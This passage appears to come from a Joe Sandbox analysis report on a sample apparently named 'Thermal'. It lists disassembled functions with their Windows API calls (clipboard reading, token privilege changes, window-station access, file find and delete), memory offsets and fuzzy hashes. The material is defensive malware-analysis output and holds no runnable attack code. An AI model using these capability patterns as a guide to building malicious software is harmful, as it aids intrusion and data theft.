                                                      • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                      • Instruction Fuzzy Hash: 80F08CB6400208FFDF158F44DC00CEB7B79EB89324F104198F9085B111D332EA218BB0
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,?,001327AF,?,00000001), ref: 00134A63
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: a59608665f784603c56f68371a6ba3f48cba6937253a630e629aa46c3b1a6c3f
                                                      • Instruction ID: e4d4d7d77e7921913127e166d7015fa43261f6a122b369bd253bc047fcb37ffa
                                                      • Opcode Fuzzy Hash: a59608665f784603c56f68371a6ba3f48cba6937253a630e629aa46c3b1a6c3f
                                                      • Instruction Fuzzy Hash: 69F01571145701CFCB389F64E494826BBF1AF143257208A6EE1D793721C731A984DB44
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID:
                                                      • API String ID: 2638373210-0
                                                      • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                      • Instruction ID: f32e532bc391f4d8da517c07b6e77714636d179296a7b3124e341e75cb3d8234
                                                      • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                      • Instruction Fuzzy Hash: 77F0FE7140020DFFDF05CF90C941EAA7B79FB15314F118589FD194B112D736DA21AB91
                                                      APIs
                                                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 001409E4
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath_memmove
                                                      • String ID:
                                                      • API String ID: 2514874351-0
                                                      • Opcode ID: 8beaa2c3ea8f0f2acfe6226412570bf3282c9dbb0f833ca4b00b54433ad36443
                                                      • Instruction ID: 81b61b43b4f620b74e0a2b0321728ef4d6e7029c74e4c0a0bc457cc8cfe992f1
                                                      • Opcode Fuzzy Hash: 8beaa2c3ea8f0f2acfe6226412570bf3282c9dbb0f833ca4b00b54433ad36443
                                                      • Instruction Fuzzy Hash: 87E086329001286BC72196989C05FEE77EDEB89691F0402B6FC08D7214DA609C818691
                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00184D31
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: FolderPath_memmove
                                                      • String ID:
                                                      • API String ID: 3334745507-0
                                                      • Opcode ID: dc3a48cfb21da1b4a8c262081be2d8db548142dfb74b8d882f1c61f2b492ee98
                                                      • Instruction ID: 648b0e79c5ce67f67ee1d2770bac821b244e41848c91ed9319ed4040fd1db552
                                                      • Opcode Fuzzy Hash: dc3a48cfb21da1b4a8c262081be2d8db548142dfb74b8d882f1c61f2b492ee98
                                                      • Instruction Fuzzy Hash: A8D05EA190032C3BDB60E6A49C4DDF77BACD744220F0007E17C5CC3101EA249D8586E0
                                                      APIs
                                                        • Part of subcall function 0018384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00183959,00000000,00000000,?,001705DB,001D8070,00000002,?,?), ref: 001838CA
                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,001705DB,001D8070,00000002,?,?,?,00000000), ref: 00183967
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: File$PointerWrite
                                                      • String ID:
                                                      • API String ID: 539440098-0
                                                      • Opcode ID: 045d3f650a618bb6637acf5bf4067730f045bd91e6cc4be3852ef7684fb4ec2c
                                                      • Instruction ID: 9b930d912c016c3473f697c2fba6a437a1ebbf42b8b798b1389ad470a28ca22d
                                                      • Opcode Fuzzy Hash: 045d3f650a618bb6637acf5bf4067730f045bd91e6cc4be3852ef7684fb4ec2c
                                                      • Instruction Fuzzy Hash: 64E04F35400208BBD720AF94D801A9AB7BCEB05710F00465AFD4091511D7B29E149B90
                                                      APIs
                                                      • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00183E7D,?,?,?), ref: 00183F0D
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CopyFile
                                                      • String ID:
                                                      • API String ID: 1304948518-0
                                                      • Opcode ID: 1063cc278e3f99304268d0f6c0db4c258f3d6b05bbdd04c0320319d1bf6b03db
                                                      • Instruction ID: 447de8492edded991147894c83f3acf8a02f917f88d968c5b8f926a1d7465b5a
                                                      • Opcode Fuzzy Hash: 1063cc278e3f99304268d0f6c0db4c258f3d6b05bbdd04c0320319d1bf6b03db
                                                      • Instruction Fuzzy Hash: 2BD0A7315E020CBBEF50DFA0CC06F69B7ACE705706F1002E4B504D90E0DB7269189795
                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,001706E6,00000000,00000000,00000000), ref: 001342BF
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 6b827b6169cbcb646f90ab89a9c6995b81b0a42b16d09263dd841b5283105de8
                                                      • Instruction ID: f8a6d69f41c9b32610e172a5b944b2af16d18b1de61ec8af158e6833507d02f6
                                                      • Opcode Fuzzy Hash: 6b827b6169cbcb646f90ab89a9c6995b81b0a42b16d09263dd841b5283105de8
                                                      • Instruction Fuzzy Hash: 32D0C77464020CBFE715DB84DC46FAA777CE705710F100294FD0466690D6B2BD508795
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,00183BFE), ref: 00184FED
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 16bb588bc9f5c723b5844c02e58feb4b778f7286daf8853100fabbc4bfbbfce8
                                                      • Instruction ID: db4e88518d7b51e4f34a7c4b1df0f9fd65442711f3f8b498713e95cff0706973
                                                      • Opcode Fuzzy Hash: 16bb588bc9f5c723b5844c02e58feb4b778f7286daf8853100fabbc4bfbbfce8
                                                      • Instruction Fuzzy Hash: 91B09234000602579D283F3C194809A33015A563A97D81B89E578858E19F39898BAA60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __wfsopen
                                                      • String ID:
                                                      • API String ID: 197181222-0
                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction ID: dd88b65ced09a11ab6d6ac5b1726c0341f4e04a786a57e2a1efad327577fc0dd
                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction Fuzzy Hash: 9EB0927644020C77CF012A92EC03A593B2A9B50668F448020FB0C1C172B673A6A09689
                                                      APIs
                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 0018D842
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      • Opcode ID: a46e3cfa02dbf7b1bd80b6b9595c76da5e5434a391d1114591650e73b74292cf
                                                      • Instruction ID: 511e44b72def3469a8e1955ac61cc8d10d0b141938fbb5a88171be6634977c7e
                                                      • Opcode Fuzzy Hash: a46e3cfa02dbf7b1bd80b6b9595c76da5e5434a391d1114591650e73b74292cf
                                                      • Instruction Fuzzy Hash: C57171706043019FC714EF64E491A6EB7E1BFA9354F04462DF5969B2A2DB30EE09CF52
                                                      APIs
                                                        • Part of subcall function 00184005: FindFirstFileW.KERNEL32(?,?), ref: 0018407C
                                                        • Part of subcall function 00184005: DeleteFileW.KERNEL32(?,?,?,?), ref: 001840CC
                                                        • Part of subcall function 00184005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 001840DD
                                                        • Part of subcall function 00184005: FindClose.KERNEL32(00000000), ref: 001840F4
                                                      • GetLastError.KERNEL32 ref: 0018C292
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                      • String ID:
                                                      • API String ID: 2191629493-0
                                                      • Opcode ID: f9930bd7472f29193851a656eefa1a5bb1ef3e260da6281c3d19941d38d5a211
                                                      • Instruction ID: bd41cab1e35c7c1c54516d6ff89ad38b0cf5837bd5c7a12fcca1701fee08bf18
                                                      • Opcode Fuzzy Hash: f9930bd7472f29193851a656eefa1a5bb1ef3e260da6281c3d19941d38d5a211
                                                      • Instruction Fuzzy Hash: FEF08C322106148FDB10FF99E844B6AB7E5AFA8320F058019F9498B352CB74BD02CF94
                                                      APIs
                                                      • CloseHandle.KERNEL32(?,?,00000000,00162F8B), ref: 001342EF
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: c873a9ae1da9ceba7403e227f5e6440a9f2fbbc2e01ceb258e321a0156c47497
                                                      • Instruction ID: 828de11ce9a5d567dd0004360309b7c7bc292e3343b89567d6d308ec3a7cfa6e
                                                      • Opcode Fuzzy Hash: c873a9ae1da9ceba7403e227f5e6440a9f2fbbc2e01ceb258e321a0156c47497
                                                      • Instruction Fuzzy Hash: 14E09275400B01CFC3314F1AE804412FBE4FFE53613214A2EE4E6A2660D3B0689A8F90
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 001AD208
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001AD249
                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 001AD28E
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001AD2B8
                                                      • SendMessageW.USER32 ref: 001AD2E1
                                                      • _wcsncpy.LIBCMT ref: 001AD359
                                                      • GetKeyState.USER32(00000011), ref: 001AD37A
                                                      • GetKeyState.USER32(00000009), ref: 001AD387
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001AD39D
                                                      • GetKeyState.USER32(00000010), ref: 001AD3A7
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001AD3D0
                                                      • SendMessageW.USER32 ref: 001AD3F7
                                                      • SendMessageW.USER32(?,00001030,?,001AB9BA), ref: 001AD4FD
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 001AD513
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 001AD526
                                                      • SetCapture.USER32(?), ref: 001AD52F
                                                      • ClientToScreen.USER32(?,?), ref: 001AD594
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001AD5A1
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001AD5BB
                                                      • ReleaseCapture.USER32 ref: 001AD5C6
                                                      • GetCursorPos.USER32(?), ref: 001AD600
                                                      • ScreenToClient.USER32(?,?), ref: 001AD60D
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 001AD669
                                                      • SendMessageW.USER32 ref: 001AD697
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 001AD6D4
                                                      • SendMessageW.USER32 ref: 001AD703
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 001AD724
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 001AD733
                                                      • GetCursorPos.USER32(?), ref: 001AD753
                                                      • ScreenToClient.USER32(?,?), ref: 001AD760
                                                      • GetParent.USER32(?), ref: 001AD780
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 001AD7E9
                                                      • SendMessageW.USER32 ref: 001AD81A
                                                      • ClientToScreen.USER32(?,?), ref: 001AD878
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 001AD8A8
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 001AD8D2
                                                      • SendMessageW.USER32 ref: 001AD8F5
                                                      • ClientToScreen.USER32(?,?), ref: 001AD947
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 001AD97B
                                                        • Part of subcall function 001229AB: GetWindowLongW.USER32(?,000000EB), ref: 001229BC
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001ADA17
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 3977979337-4164748364
                                                      • Opcode ID: f1b70eb563eb43876586d81a3660bcbc3231d13f98bd73f98c0c24995e16249f
                                                      • Instruction ID: 0e158db0d35d7dd5676ba8c720c296d276e22434a07191d6bddd8b52dffcd4c2
                                                      • Opcode Fuzzy Hash: f1b70eb563eb43876586d81a3660bcbc3231d13f98bd73f98c0c24995e16249f
                                                      • Instruction Fuzzy Hash: 1442F178204740AFDB25CF28D844FAABBE5FF5E310F14065AF65687AA0C771D894CB91
                                                      APIs
                                                        • Part of subcall function 00179399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001793E3
                                                        • Part of subcall function 00179399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00179410
                                                        • Part of subcall function 00179399: GetLastError.KERNEL32 ref: 0017941D
                                                      • _memset.LIBCMT ref: 00178F71
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00178FC3
                                                      • CloseHandle.KERNEL32(?), ref: 00178FD4
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00178FEB
                                                      • GetProcessWindowStation.USER32 ref: 00179004
                                                      • SetProcessWindowStation.USER32(00000000), ref: 0017900E
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00179028
                                                        • Part of subcall function 00178DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00178F27), ref: 00178DFE
                                                        • Part of subcall function 00178DE9: CloseHandle.KERNEL32(?,?,00178F27), ref: 00178E10
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                      • String ID: $default$winsta0
                                                      • API String ID: 2063423040-1027155976
                                                      • Opcode ID: 6fec3001629ba134e999711d4c2f43b6db5646a629d3fb94b16ceb8f0055cdba
                                                      • Instruction ID: e98eadd76e6ce49fc8d465a5e2a84b4ef35a7ca1576dc1e0b64a09e86a5d705e
                                                      • Opcode Fuzzy Hash: 6fec3001629ba134e999711d4c2f43b6db5646a629d3fb94b16ceb8f0055cdba
                                                      • Instruction Fuzzy Hash: 8E818F71800209BFDF11DFA4CC49AEEBB79FF08314F548159F918A6260DB328E69DB60
                                                      APIs
                                                      • OpenClipboard.USER32(001B0980), ref: 0019465C
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0019466A
                                                      • GetClipboardData.USER32(0000000D), ref: 00194672
                                                      • CloseClipboard.USER32 ref: 0019467E
                                                      • GlobalLock.KERNEL32(00000000), ref: 0019469A
                                                      • CloseClipboard.USER32 ref: 001946A4
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 001946B9
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 001946C6
                                                      • GetClipboardData.USER32(00000001), ref: 001946CE
                                                      • GlobalLock.KERNEL32(00000000), ref: 001946DB
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0019470F
                                                      • CloseClipboard.USER32 ref: 0019481F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                      • String ID:
                                                      • API String ID: 3222323430-0
                                                      • Opcode ID: 21472101f9264db794ee4d77d75c46f8121c9c12ba7e678b7d0713d4b5f45299
                                                      • Instruction ID: 8b66b91ac276f7c6cd6cf7be063a5723188f8e922f30d80d21181a73799ce7ab
                                                      • Opcode Fuzzy Hash: 21472101f9264db794ee4d77d75c46f8121c9c12ba7e678b7d0713d4b5f45299
                                                      • Instruction Fuzzy Hash: 1E51DF71204305AFDB11EF64EC89F6F77A8AF98B50F004629F646D21E1EF30D9468B62
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0018CDD0
                                                      • FindClose.KERNEL32(00000000), ref: 0018CE24
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0018CE49
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0018CE60
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0018CE87
                                                      • __swprintf.LIBCMT ref: 0018CED3
                                                      • __swprintf.LIBCMT ref: 0018CF16
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      • __swprintf.LIBCMT ref: 0018CF6A
                                                        • Part of subcall function 001438C8: __woutput_l.LIBCMT ref: 00143921
                                                      • __swprintf.LIBCMT ref: 0018CFB8
                                                        • Part of subcall function 001438C8: __flsbuf.LIBCMT ref: 00143943
                                                        • Part of subcall function 001438C8: __flsbuf.LIBCMT ref: 0014395B
                                                      • __swprintf.LIBCMT ref: 0018D007
                                                      • __swprintf.LIBCMT ref: 0018D056
                                                      • __swprintf.LIBCMT ref: 0018D0A5
                                                      Strings
